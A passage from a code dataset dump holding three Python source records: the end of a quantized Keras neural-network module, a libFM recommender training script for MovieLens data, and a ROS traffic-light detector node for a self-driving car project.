/ np.sqrt(1.5 / (nb_input + nb_output)))\n\n self.kernel_constraint = Clip(-self.H, self.H)\n self.kernel_initializer = initializers.RandomUniform(-self.H, self.H)\n self.kernel = self.add_weight(shape=kernel_shape,\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint)\n\n if self.use_bias:\n self.lr_multipliers = [self.kernel_multiplier, self.bias_multiplier]\n self.bias = self.add_weight(shape=(self.filters,),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n\n else:\n self.lr_multipliers = [self.kernel_multiplier]\n self.bias = None\n\n \"\"\"\n Specifies the rank, dtype and shape of every input to a layer.\n\n Layers can expose (if appropriate) an `input_spec` attribute:\n an instance of `InputSpec`, or a nested structure of `InputSpec` instances\n (one per input tensor). These objects enable the layer to run input\n compatibility checks for input structure, input rank, input shape, and\n input dtype.\n\n A None entry in a shape is compatible with any dimension,\n a None shape is compatible with any shape.\n \"\"\"\n self.input_spec = InputSpec(ndim=2, axes={-1: input_dim})\n self.built = True\n\n def call(self, inputs):\n quantized_kernel = Quantized_optimizers.quantize(self, self.kernel, nb=self.nb)\n\n inverse_kernel_multiplier = 1. / self.kernel_multiplier\n inputs_qnn_gradient = (inputs - (1. - 1. / inverse_kernel_multiplier) * K.stop_gradient(inputs)) \\\n * inverse_kernel_multiplier\n\n outputs_qnn_gradient = K.conv2d(\n inputs_qnn_gradient,\n quantized_kernel,\n strides=self.strides,\n padding=self.padding,\n data_format=self.data_format,\n dilation_rate=self.dilation_rate)\n\n outputs = (outputs_qnn_gradient - (1. - 1. 
/ self.kernel_multiplier) *\n K.stop_gradient(outputs_qnn_gradient)) * self.kernel_multiplier\n\n if self.use_bias:\n outputs = K.bias_add(\n outputs,\n self.bias,\n data_format=self.data_format)\n\n if self.activation is not None:\n return self.activation(outputs)\n\n return outputs\n\n\ndef load_dataset(dataset):\n # Import Data, here data is a DataFrame.\n X = dataset[['AF_real', 'AF_imag']].values\n Y = dataset[['inp_real', 'inp_imag']].values\n # X = np.transpose(X)\n # Y = np.transpose(Y)\n # scale data\n # scale_data = MinMaxScaler()\n # X = scale_data.fit_transform(X)\n # Y = scale_data.fit_transform(Y)\n\n print(np.shape(X))\n print(np.shape(Y))\n # x_train, y_train, x_test, y_test = train_test_split(X, Y, test_size=0.3)\n X_train, X_test, Y_train, Y_test = train_test_split(np.array(X), np.array(Y), test_size=0.2)\n # X_val, X_test, Y_val, Y_test = train_test_split(X_val_and_test, Y_val_and_test, test_size=0.5)\n\n print(f'{X_train.shape}, {X_test.shape}, {Y_train.shape}, {Y_test.shape}')\n return X_train, X_test, Y_train, Y_test\n\n\nclass QNN_model:\n def __init__(self, problem: Problem):\n self.problem = problem\n # self.x = x\n self.epochs = 2000\n self.lr = 0.001 # Learning Rate\n self.decay = 0.000025\n\n # bits can be None, 2, 4, 8 , whatever\n self.bits = None\n self.wbits = 4\n self.abits = 4\n\n # width and depth\n self.nla, self.nlb, self.nlc = 2, 2, 2\n self.nfa, self.nfb, self.nfc = 64, 64, 64\n\n self.batch_size = 32\n\n # learning rate decay, factor => LR *= factor\n self.kernel_multiplier = 10\n self.decay_at_epoch = [0, 25, 80]\n self.factor_at_epoch = [1, 0.1, 1]\n\n self.channels = 3\n self.classes = 10\n self.dim = 32\n # regularization\n self.kernel_regularizer = 0.0\n self.activity_regularizer = 0.0\n self.progress_logging = 1\n # TODO: change dataset to my own data, and remove import line\n # dataframe_path = 'data.sqlite'\n # self.dataframe = pd.read_csv(dataframe_path)\n # self.dataset = self.dataframe.values\n # from tensorflow.keras.datasets import cifar10\n # self.dataset = cifar10\n # self.out_wght_path = 'weights.hdf5'\n\n def build_model(self):\n def quantized_relu(x):\n return Quantized_optimizers.quantized_relu(self, x, nb=self.abits)\n\n H = 1\n\n Conv_ = lambda s, f, i, c: ConvQuantized(kernel_size=(s, s), H=1, nb=self.wbits, filters=f, strides=(1, 1),\n padding='same', activation='linear',\n kernel_regularizer=l2(self.kernel_regularizer),\n kernel_multiplier=self.kernel_multiplier, input_shape=(i, c))\n Conv = lambda s, f: ConvQuantized(kernel_size=(s, s), H=1, nb=self.wbits, filters=f, strides=(1, 1),\n padding='same', activation='linear',\n kernel_regularizer=l2(self.kernel_regularizer),\n kernel_multiplier=self.kernel_multiplier)\n\n Dense_ = lambda f: DenseQuantized(units=f)\n Act = lambda: Activation(quantized_relu)\n\n # model for image classifications\n '''\n model = Sequential()\n model.add(Conv_(3, self.nfa, self.dim, self.channels))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n\n \"\"\"\n Each tested network contains 4 stages. 3 QNN-blocks, each followed by a max-pooling\n layer and 1 fully-connected classification stage. 
Each QNN-block is defined by 2 parameters: the\n number of basic building blocks n and the layer width F.\n Every QNN-sequence is a cascade of a QNN-layer, followed\n by a batch-normalization layer and a quantized activation\n function.\n \"\"\"\n # block A\n for i in range(0, self.nla - 1):\n model.add(Conv(3, self.nfa))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n # block B\n for i in range(0, self.nlb):\n model.add(Conv(3, self.nfb))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n # block C\n for i in range(0, self.nlc):\n model.add(Conv(3, self.nfc))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n # Dense Layer\n model.add(Flatten())\n model.add(Dense(self.classes, use_bias=False))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n\n '''\n\n # model for prediction\n model = Sequential()\n model.add(Dense_(self.nfa))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n\n # for i in range(0, self.nla - 1):\n model.add(Dense_(self.nfa))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n # model.add(MaxPooling2D())\n\n # block B\n # for i in range(0, self.nlb):\n model.add(Dense_(self.nfb))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n\n # # block C\n # for i in range(0, self.nlc):\n model.add(Dense_(self.nfc))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n\n # Dense Layer\n model.add(Flatten())\n model.add(Dense(2))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n\n return model\n\n def plot_QNNmodel(self, hist, y_test, y_pred):\n plt.plot(hist.history['mean_squared_error'])\n # plt.plot(hist.history['val_acc'])\n plt.title('Model MSE')\n plt.xlabel('Epoch')\n plt.ylabel('MSE')\n plt.legend(['Train'], loc='upper right')\n plt.savefig('fig_mse_model.png')\n plt.show()\n\n plt.plot(hist.history['loss'])\n # plt.plot(hist.history['val_loss'])\n plt.title('Model loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.legend(['Train'], loc='upper right')\n plt.savefig('fig_loss_model.png')\n plt.show()\n\n plt.plot(y_test[0], 'b-')\n plt.plot(y_pred[0], 'r-')\n plt.xlabel('Time', size=14)\n plt.ylabel('Value', size=14)\n plt.legend(['measured output', 'predicted output'], loc='upper right')\n plt.savefig('predict.png')\n plt.show()\n\n # plt.scatter(y_test, y_pred, color='blue', label='data')\n # plt.plot(y_pred, y_fit, color='red', linewidth=2, label='Linear regression\\n' + reg_label)\n # plt.title('Linear Regression')\n # plt.legend()\n # plt.xlabel('observed')\n # plt.ylabel('predicted')\n # plt.savefig('linear_regression.png')\n # plt.show()\n\n def train(self, problem):\n\n # learning rate schedule\n # def scheduler(epoch):\n # if epoch in self.decay_at_epoch:\n # index = self.decay_at_epoch.index(epoch)\n # factor = self.factor_at_epoch[index]\n # lr = K.get_value(model.optimizer.lr)\n #\n # # TODO: Add x_train to here.\n # IT = X_train.shape[0] / self.batch_size\n # current_lr = lr * (1. / (1. 
+ self.decay * epoch * IT))\n # K.set_value(model.optimizer.lr, current_lr * factor)\n #\n # return K.get_value(model.optimizer.lr)\n\n model = self.build_model()\n # early_stop = EarlyStopping(monitor='loss', min_delta=0.001, patience=10, mode='min', verbose=1)\n # checkpoint = ModelCheckpoint(self.out_wght_path, monitor='val_mean_squared_error',\n # verbose=1, save_best_only=True,\n # mode='max', period=1)\n\n # TODO: The line bellow must be added, first specify the dataset, and then implement load_dataset\n X_train, X_test, Y_train, Y_test = load_dataset(problem.data)\n\n # lr_decay = LearningRateScheduler(scheduler)\n # adam = Adam(lr=self.lr, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=self.decay)\n model.compile(loss=tf.keras.losses.MeanSquaredError(), optimizer='adam', metrics=['mean_squared_error'])\n start = time.time()\n hist = model.fit(X_train, Y_train,\n batch_size=self.batch_size,\n epochs=self.epochs,\n verbose=self.progress_logging)\n # callbacks=[checkpoint, lr_decay])\n\n print(f'Training time : {time.time() - start} s')\n # plot_model(model, to_file='QNN_model.png', show_shapes=True, rankdir=\"LR\")\n with open('QNN_summary_model.txt', 'w') as file:\n with redirect_stdout(file):\n model.summary()\n model.save('QNN_model.h5')\n\n # min_max_scaler = MinMaxScaler()\n # X_test = min_max_scaler.fit_transform(X_test)\n\n y_pred = model.predict(X_test)\n # Unscale data\n # min_max_scaler = MinMaxScaler()\n # Xtest_us = min_max_scaler.inverse_transform(X_test)\n # Xtest_us = min_max_scaler.fit_transform(X_test)\n # ytest_us = min_max_scaler.inverse_transform(Y_test)\n # yp = min_max_scaler.inverse_transform(y_pred)\n # sp = Xtest_us[:,1]\n # plt.plot(sp,'r-',label='$T_1$ $(^oC)$')\n\n # regressor = LinearRegression()\n # regressor.fit(Y_test.reshape(-1, 1), y_pred[:, 0])\n # y_fit = regressor.predict(y_pred[:, 0].reshape(-1, 1))\n #\n # reg_intercept = round(regressor.intercept_, 4)\n # reg_coef = round(regressor.coef_.flatten()[0], 4)\n # reg_label = \"y = \" + str(reg_intercept) + \"*x +\" + str(reg_coef)\n loss, mse = model.evaluate(X_test, Y_test)\n print(f'loss = {loss}, and mse = {mse}')\n\n print(f'Y_test : {Y_test}')\n print(f'y_pred : {y_pred}')\n self.plot_QNNmodel(hist, Y_test, y_pred)\n","sub_path":"artap/NNQuantized.py","file_name":"NNQuantized.py","file_ext":"py","file_size_in_byte":34004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"241601134","text":"# encoding: utf-8\n\n\n\"\"\"\n@author: zoulixin\n@contact: zoulx15@mails.tsinghua.edu.cn\n@time: 16-12-23 上午11:36\n\"\"\"\n__all__ = [\"libFM_train\"]\nimport configs\nfrom sklearn.feature_extraction import DictVectorizer\nimport pywFM\nimport numpy as np\nimport util\nimport dataset\nimport theano\nimport collections\nimport scipy.sparse as sparse\n\nclass libFM_train():\n def __init__(self,config = configs.cf_libFM_config):\n # load data\n self.config = config\n util.log().init(self.config)\n self.get_data()\n self.train()\n pass\n\n def get_data(self):\n util.log().info(\"libFM load data\")\n data = dataset.movieLens(self.config)\n all, train_num, validation_num, test_num, max_sequence, min_sequence = data.get_seq_data()\n\n self.user_num = all.shape[0]\n self.item_num = self.config.item_num\n self.train_set = xrange(train_num + validation_num)\n self.test_set = range(train_num + validation_num, train_num + validation_num + test_num)\n self.out_dim = self.config.out_dim\n self.train_data, self.train_mask, self.test_data, self.test_mask = 
self.convert2libFM(all,self.train_set,self.test_set,self.out_dim)\n self.seen = np.sum(self.train_mask, axis=0)\n self.seen = self.seen * 1.0 / self.user_num\n self.convert2feature(self.train_data)\n\n self.train_x,self.train_y = self.convert2feature(self.train_data)\n self.test_x, self.test_y = self.convert2feature(self.test_data)\n # v = DictVectorizer()\n # self.train_x = v.fit_transform(train_x)\n # print type(self.train_x)\n # print self.train_x.shape\n # self.test_x = v.transform(test_x)\n # print self.test_x\n pass\n\n def convert2libFM(self,rating,train_set,test_set,out_dim):\n train_data = np.zeros(shape=(self.user_num, self.item_num), dtype=theano.config.floatX)\n train_mask = np.zeros(shape=(self.user_num, self.item_num), dtype=np.int8)\n test_data = np.zeros(shape=(self.user_num, self.item_num), dtype=theano.config.floatX)\n test_mask = np.zeros(shape=(self.user_num, self.item_num), dtype=np.int8)\n for i in train_set:\n subset = np.transpose(rating[i, :, :])\n row = list(subset[0, np.nonzero(subset[0, :] >= 0)][0])\n train_data[i, row] = subset[1, np.nonzero(subset[1, :] >= 0)][0]\n train_mask[i, row] = 1\n\n for i in test_set:\n subset = np.transpose(rating[i, :, :])\n row = list(subset[0, np.nonzero(subset[0, :] >= 0)][0])\n train_data[i, row[:-out_dim]] = subset[1, np.nonzero(subset[1, :] >= 0)][0][:-out_dim]\n train_mask[i, row[:-out_dim]] = 1\n test_data[i, row[-out_dim:]] = subset[1, np.nonzero(subset[1, :] >= 0)][0][-out_dim:]\n test_mask[i, row[-out_dim:]] = 1\n return train_data, train_mask, test_data, test_mask\n pass\n\n def convert2feature(self,rating_matrix):\n (x,y) = np.nonzero(rating_matrix)\n z = rating_matrix[x,y]\n data = []\n row = []\n col = []\n for i in xrange(x.shape[0]):\n data.append(1.0)\n row.append(i)\n col.append(x[i])\n data.append(1.0)\n row.append(i)\n col.append(x[i] + y[i])\n res = sparse.csr_matrix((data,(row,col)),shape=(x.shape[0],rating_matrix.shape[0]+rating_matrix.shape[1]),dtype=np.float16)\n return res,z\n\n\n # def load_data(self,data_path,ratio=0.1):\n # train_data = []\n # train_y = []\n # test_data = []\n # test_y = []\n # users = set()\n # items = set()\n # f = open(data_path)\n # lines = f.readlines()\n # pos = np.random.uniform(low=0.0,high=1.0,size=(len(lines,)))\n # i=0\n # for line in lines:\n # (user, movieid, rating, ts) = line.split('::')\n # if pos[i]<=ratio:\n # test_data.append({\"user_id\": str(user), \"movie_id\": str(movieid)})\n # test_y.append(float(rating))\n # else:\n # train_data.append({\"user_id\": str(user), \"movie_id\": str(movieid)})\n # train_y.append(float(rating))\n # users.add(user)\n # items.add(movieid)\n # i+=1\n # return (train_data, np.array(train_y),test_data,np.array(test_y),users, items)\n\n def metric_cal(self, pred_r, true_r, mask):\n se = []\n n = []\n for metric_cal in self.config.metrics:\n temp = metric_cal().cal(Pred_r=pred_r, True_r=true_r, mask=mask, rec_num=self.config.rec_num,\n indifferent=self.config.indifferent, seen=self.seen,\n feature=None)\n se.append(temp[0])\n n.append(temp[1])\n return se, n\n\n\n def train(self):\n # fm(preds, global_bias, weights, pairwise_interactions, rlog)\n fm = pywFM.FM(task=\"regression\",num_iter=1000)\n model = fm.run(self.train_x,self.train_y,self.test_x,self.test_y)\n self.user_feature = model[3][:self.user_num,:]\n self.item_feature = model[3][-self.item_num:,:]\n self.user_bias = np.zeros(shape=(self.user_num,self.item_num))\n self.item_bias = np.zeros(shape=(self.user_num,self.item_num))\n for i in xrange(self.user_num):\n 
self.user_bias[i,:] = model[2][i]\n for i in xrange(self.item_num):\n temp = self.item_num - i\n self.item_bias[:,i] = model[2][-temp]\n prediction = self.user_feature*np.transpose(self.item_feature) + model[1] + self.user_bias + self.item_bias\n pred = np.asarray(prediction[self.test_set, :])\n metric_result, n_value = self.metric_cal(pred_r=pred, true_r=self.test_data[self.test_set, :], mask=self.test_mask[self.test_set, :])\n metrics_value = []\n for i in xrange(len(self.config.metrics)):\n se = metric_result[i]\n n = n_value[i]\n if self.config.metrics[i].__name__ == \"RMSE\":\n res = np.sqrt(se / (n * 1.0 + 1e-8))\n else:\n res = se / (n * 1.0 + 1e-8)\n metrics_value.append(res)\n metrics_info = [str(self.config.metrics[i].__name__) + \": {0:.6f}\".format(metrics_value[i])\n for i in xrange(len(self.config.metrics))]\n util.log().info('Train :\\n' + str(metrics_info).replace(',', '\\n') )\n\n\n\n\nif __name__ == '__main__':\n pass\n pass","sub_path":"other/libFM.py","file_name":"libFM.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328915678","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight, TrafficLightStateAndWP\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport tf\nimport cv2\nimport yaml\nimport math\nimport random\n\nimport matplotlib.pyplot as plt\n\nSTATE_COUNT_THRESHOLD = 3\nPROCESS_TL_GROUND_TRUTH = False\n\nWPS_TO_TL_FROM_STOP_LINE = 15 #mts\nDISTANCE_FROM_TL_FOR_PREDICTION = 120 #mts\n\nclass TLDetector(object):\n\n def __init__(self):\n\n rospy.init_node('tl_detector')\n\n self.pose = None\n self.waypoints = None\n self.camera_image = None\n self.lights = []\n\n # Currently used to fake notification of traffic light state using ground truth\n self.lights_ix = []\n self.lights_indices = False\n \n sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n\n '''\n /vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and\n helps you acquire an accurate ground truth data source for the traffic light\n classifier by sending the current color state of all traffic lights in the\n simulator. When testing on the vehicle, the color state will not be available. 
You'll need to\n rely on the position of the light and the camera image to predict it.\n '''\n sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)\n sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)\n\n config_string = rospy.get_param(\"/traffic_light_config\")\n self.config = yaml.load(config_string)\n self.tl_nearest_wps = [] # list of index of nearest waypoint to traffic lights\n self.wp_to_nearest_stopline_wp = {} # map from waypoint index to nearest tl stopline waypoint index\n\n self.upcoming_light_pub = rospy.Publisher('/traffic_waypoint',\n TrafficLightStateAndWP,\n queue_size=1)\n\n self.bridge = CvBridge()\n\n # construct TL classifier\n self.light_classifier = None\n if not PROCESS_TL_GROUND_TRUTH:\n self.light_classifier = TLClassifier()\n else:\n self.light_classifier = 1 # anything != None\n\n self.listener = tf.TransformListener()\n\n self.state = TrafficLight.UNKNOWN\n self.last_state = TrafficLight.UNKNOWN\n self.last_wp = -1\n self.state_count = 0\n\n rospy.spin()\n\n\n def initialized(self):\n\n if self.waypoints and self.light_classifier and self.pose:\n return True\n else:\n return False\n\n\n def pose_cb(self, msg):\n self.pose = msg\n\n\n def waypoints_cb(self, waypoints):\n self.waypoints = waypoints\n\n # Processing stop line positions\n # Since this function is called only once, doing this\n # calculation here should be fine\n stop_line_positions = self.config['stop_line_positions']\n rospy.loginfo(\"stop positions %s %d\", stop_line_positions, len(stop_line_positions))\n dl = lambda a, b: math.sqrt((a.x - b[0])**2 + (a.y - b[1])**2) \n for p in stop_line_positions:\n nearest_wp_idx = 0\n min_dist = 1e12\n for i in range(len(waypoints.waypoints)):\n d = dl(waypoints.waypoints[i].pose.pose.position, p) \n if d < min_dist:\n min_dist = d\n nearest_wp_idx = i\n self.tl_nearest_wps.append(nearest_wp_idx)\n\n # sort the list in case stop lines were not in order\n self.tl_nearest_wps.sort()\n\n rospy.loginfo(\"tl_nearest_wps %s\", self.tl_nearest_wps)\n # for p in self.tl_nearest_wps:\n # rospy.loginfo(\"tl waypoint %s\", waypoints.waypoints[p].pose.pose.position)\n\n # populate map from waypoint index to nearest stopline waypoint index\n wp_idx = 0\n for stop_wp_idx in self.tl_nearest_wps:\n while wp_idx <= stop_wp_idx:\n self.wp_to_nearest_stopline_wp[wp_idx] = stop_wp_idx\n wp_idx += 1\n\n while wp_idx < len(waypoints.waypoints):\n self.wp_to_nearest_stopline_wp[wp_idx] = 0 # loop around the track\n wp_idx += 1\n\n # # Randomly test few waypoints\n # for i in random.sample(range(len(waypoints.waypoints)), 10):\n # rospy.loginfo(\"idx:%d stop_idx:%d\", i, self.wp_to_nearest_stopline_wp[i])\n # i = self.tl_nearest_wps[0]\n # rospy.loginfo(\"idx:%d stop_idx:%d\", i, self.wp_to_nearest_stopline_wp[i])\n \n def image_cb(self, msg):\n \"\"\"Identifies red lights in the incoming camera image and publishes the index\n of the waypoint closest to the red light's stop line to /traffic_waypoint\n\n Args:\n msg (Image): image from car-mounted camera\n\n \"\"\"\n \n if not self.initialized():\n return\n\n self.has_image = True\n self.camera_image = msg\n\n # NOTE: Used to lookup light state from ground truth. 
Must be updated to use\n # process_traffic_lights function when ready\n if(PROCESS_TL_GROUND_TRUTH):\n light_wp, state = self.process_traffic_lights_ground_truth()\n else:\n light_wp, state = self.process_traffic_lights()\n \n '''\n Publish upcoming red lights at camera frequency.\n Each predicted state has to occur `STATE_COUNT_THRESHOLD` number\n of times till we start using it. Otherwise the previous stable state is\n used.\n '''\n notify_state = TrafficLightStateAndWP()\n \n if self.state != state:\n self.state_count = 0\n self.state = state\n self.state_first_detect_time = rospy.get_rostime()\n elif self.state_count >= STATE_COUNT_THRESHOLD:\n self.last_state = self.state\n #light_wp = (light_wp\n # if ((state == TrafficLight.RED) or (state == TrafficLight.YELLOW))\n # else -1)\n self.last_wp = light_wp\n if(light_wp != -1):\n notify_state.header.frame_id = '/tl_waypoint'\n notify_state.header.stamp = rospy.get_rostime()\n notify_state.wp_ix = light_wp\n notify_state.state = state\n notify_state.first_detect_time = self.state_first_detect_time\n \n self.upcoming_light_pub.publish(notify_state)\n \n else:\n if(self.last_wp != -1):\n notify_state.header.frame_id = '/tl_waypoint'\n notify_state.header.stamp = rospy.get_rostime()\n notify_state.wp_ix = self.last_wp\n notify_state.state = self.last_state\n notify_state.first_detect_time = self.state_first_detect_time\n self.upcoming_light_pub.publish(notify_state)\n \n self.state_count += 1\n\n\n def get_closest_waypoint(self, pose):\n \"\"\"Identifies the closest path waypoint to the given position\n https://en.wikipedia.org/wiki/Closest_pair_of_points_problem\n Args:\n pose (Pose): position to match a waypoint to\n\n Returns:\n int: index of the closest waypoint in self.waypoints\n\n \"\"\"\n #TODO implement\n return 0\n\n def get_light_state(self):\n \"\"\"Determines the current color of the traffic light\n\n Args:\n light (TrafficLight): light to classify\n\n Returns:\n int: State of traffic light (red, unknown)\n\n \"\"\"\n if(not self.has_image):\n self.prev_light_loc = None\n return TrafficLight.UNKNOWN\n\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"rgb8\") #bgr8\n\n #Get classification\n return self.light_classifier.get_classification(cv_image)\n\n def find_closest_tl_in_front(self, ego_waypoint_ix):\n\n #to handle wraparound\n last_tl_wp = self.tl_nearest_wps[len(self.tl_nearest_wps) - 1]\n \n if(ego_waypoint_ix > last_tl_wp + WPS_TO_TL_FROM_STOP_LINE):\n # We are about to wraparound. 
return the first wp in list\n closest_light_ix = self.tl_nearest_wps[0]\n\n # Approximation\n dist_to_tl = (self.dist(self.waypoints.waypoints[closest_light_ix].pose.pose.position,\n self.waypoints.waypoints[ego_waypoint_ix].pose.pose.position)\n + WPS_TO_TL_FROM_STOP_LINE)\n else:\n for light_wp_ix in self.tl_nearest_wps:\n if(ego_waypoint_ix > light_wp_ix + WPS_TO_TL_FROM_STOP_LINE):\n continue\n closest_light_ix = light_wp_ix\n break\n\n # Approximation\n dist_to_tl = (closest_light_ix + WPS_TO_TL_FROM_STOP_LINE) - ego_waypoint_ix\n\n return closest_light_ix, dist_to_tl\n \n \n def process_traffic_lights(self):\n \"\"\"Finds closest visible traffic light, if one exists, and determines its\n location and color\n\n Returns:\n int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists)\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n light = None\n\n # List of positions that correspond to the line to stop in front of for a given intersection\n # stop_line_positions = self.config['stop_line_positions']\n # if(self.pose):\n # car_position = self.get_closest_waypoint(self.pose.pose)\n\n ego_waypoint_ix = self.find_closest_waypoint_ix(self.pose,\n self.waypoints.waypoints)\n\n min_dist = 1e12\n closest_light_ix = 0\n closest_light_state = 0\n\n return_light_ix = -1\n return_light_state = TrafficLight.UNKNOWN\n\n closest_light_ix, dist_to_tl = self.find_closest_tl_in_front(ego_waypoint_ix)\n\n #rospy.loginfo(\" Ego index: %d pos: x:%f, y:%f\",\n # ego_waypoint_ix,\n # self.pose.pose.position.x,\n # self.pose.pose.position.y)\n\n #rospy.loginfo(\" Upcoming Light index: %d\",\n # closest_light_ix)\n\n return_light_ix = closest_light_ix\n\n # try to detect only if ego is within 120 mts before light\n if( dist_to_tl < DISTANCE_FROM_TL_FOR_PREDICTION): \n return_light_state = self.get_light_state()\n\n return return_light_ix, return_light_state\n #===========================================================================\n\n # ==========================================================================\n # Auxillary functions to implement process tl from ground_truth\n #\n def traffic_cb(self, msg):\n\n if not self.initialized():\n return\n\n self.lights = msg.lights\n\n # NOTE: Here we try to find the indices of the traffic lights\n # and save them in lights_ix. 
Even though this is a function\n # used to fake trffic_waypoint notification in absence of real\n # tl_detection, making sure that we dont have to lookup the ix\n # in every iteration\n # Also note that self.lights can be used to verify training of\n # for tl_detection using images.\n if(self.lights_indices == False):\n\n for ix, light in enumerate(self.lights):\n\n # Find and save index of every light\n \n #rospy.loginfo(\" Light:%d\", ix);\n #rospy.loginfo(\" Light state=%d\", light.state)\n #rospy.loginfo(\" (unknown=%d, green=%d, yellow=%d, red=%d)\",\n # light.UNKNOWN, light.GREEN, light.YELLOW, light.RED)\n #rospy.loginfo(\" Pose msg:\")\n #rospy.loginfo(\" position: x:%f y:%f z:%f\",\n # light.pose.pose.position.x,\n # light.pose.pose.position.y,\n # light.pose.pose.position.z);\n #rospy.loginfo(\" orientation: x:%f y:%f z:%f w:%f\",\n # light.pose.pose.orientation.x,\n # light.pose.pose.orientation.y,\n # light.pose.pose.orientation.z,\n # light.pose.pose.orientation.w);\n\n light_ix = []\n light_ix.append(light)\n light_wp = self.find_closest_waypoint_ix(light.pose, self.waypoints.waypoints)\n light_ix.append(light_wp)\n\n self.lights_ix.append(light_ix)\n \n #rospy.loginfo(\" Waypoint Index: %d\", light_wp)\n\n self.lights_indices = True\n \n else:\n\n # Update the state of the light\n for ix, light in enumerate(self.lights):\n self.update_light_state(light, self.lights_ix)\n\n \n def dist(self, p1, p2):\n x, y, z = p1.x - p2.x, p1.y - p2.y, p1.z - p2.z\n return math.sqrt(x*x + y*y + z*z)\n\n\n def find_closest_waypoint_ix(self, pose, waypoints):\n closest_dist = 999\n light_wp_index = 0\n \n for index, waypoint in enumerate(waypoints):\n \n distance = self.dist(waypoint.pose.pose.position,\n pose.pose.position)\n \n if distance < closest_dist:\n light_wp_index = index\n closest_dist = distance\n\n return light_wp_index\n\n\n def update_light_state(self, new_light, lights_ix):\n for light in lights_ix:\n if((light[0].pose.pose.position.x == new_light.pose.pose.position.x)\n and (light[0].pose.pose.position.y == new_light.pose.pose.position.y)):\n light[0].state = new_light.state\n break\n \n\n #processes traffic light using ground truth data and light postions from lights msg in traffic_cb\n # note - this is different than process_traffic_lights() where 'stop line positions' are used\n def process_traffic_lights_ground_truth(self):\n\n # 1. get closest_waypoint_index to ego_vehicle\n # 2. 
compare with the closest waypoint indices of the saved light data\n    #    and return the closest one\n\n        ego_waypoint_ix = self.find_closest_waypoint_ix(self.pose,\n                                                        self.waypoints.waypoints)\n\n        min_dist = 1e12\n        closest_light_ix = 0\n        closest_light_state = 0\n\n        return_light_ix = -1\n        return_light_state = TrafficLight.UNKNOWN\n        \n        # TODO: Fix wraparound\n        for light in self.lights_ix:\n            if(ego_waypoint_ix > light[1]):\n                continue\n            dist_from_light = light[1] - ego_waypoint_ix\n            #rospy.loginfo(\" ego_ix=%d, light_ix=%d\", ego_waypoint_ix, light[1])\n            #rospy.loginfo(\" min_dist=%d, dist_from_light=%d\",\n            #              min_dist, dist_from_light)\n            if(min_dist > dist_from_light):\n                min_dist = dist_from_light\n                closest_light_ix = light[1]\n                closest_light_state = light[0].state\n\n\n        #rospy.loginfo(\" Ego index: %d pos: x:%f, y:%f\",\n        #              ego_waypoint_ix,\n        #              self.pose.pose.position.x,\n        #              self.pose.pose.position.y)\n\n        #rospy.loginfo(\" Upcoming Light index: %d\",\n        #              closest_light_ix)\n\n\n        # Since this is just faking the detection/state of the light based on ground_truth\n        # and the system keeps track of all lights on the track at any given time,\n        # notify only if the lights are within a visible range (approximation).\n\n        if ((closest_light_ix - ego_waypoint_ix) < 150):\n            return_light_ix = closest_light_ix\n            return_light_state = closest_light_state\n        \n        return return_light_ix, return_light_state\n    #===========================================================================\n    \nif __name__ == '__main__':\n    try:\n        TLDetector()\n    except rospy.ROSInterruptException:\n        rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":16548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
